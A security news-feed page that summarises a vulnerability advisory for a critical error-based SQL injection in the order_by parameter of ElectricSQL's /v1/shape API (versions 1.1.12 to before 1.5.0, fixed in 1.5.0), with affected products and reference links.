top of page
perceptive_background_267k.jpg

Electric is a Postgres sync engine. From 1.1.12 to before 1.5.0, the order_by parameter in the ElectricSQL /v1/shape API is vulnerable to error-based SQL inject…

Published:

20 April 2026 at 22:00:00

Alert date:

21 April 2026 at 22:04:46

Source:

nvd.nist.gov

Click to open the original link from this advisory

Database & Storage, Web Technologies

Electric, a Postgres sync engine, contains a critical SQL injection vulnerability in the order_by parameter of the /v1/shape API endpoint. The vulnerability affects versions 1.1.12 to before 1.5.0 and allows authenticated users to perform error-based SQL injection attacks. Attackers can read, write, and destroy the full contents of the underlying PostgreSQL database through crafted ORDER BY expressions. The vulnerability has been fixed in version 1.5.0.

Technical details

Mitigation steps:

Affected products:

Electric
ElectricSQL
PostgreSQL

Related links:

https://nvd.nist.gov/vuln/detail/CVE-2026-40906
https://github.com/electric-sql/electric/pull/4081
https://github.com/electric-sql/electric/security/advisories/GHSA-h5rg-pxx7-r2hj

Related CVE's:

Related threat actors:

IOC's:

This article was created with the assistance of AI technology by Perceptive.

About us

© 2025 by Perceptive Security. All rights reserved.

email: info@perceptivesecurity.com

Disclaimer: Deze website toont informatie afkomstig van externe bronnen. Perceptive aanvaardt geen verantwoordelijkheid voor de inhoud, juistheid of volledigheid van deze informatie.

bottom of page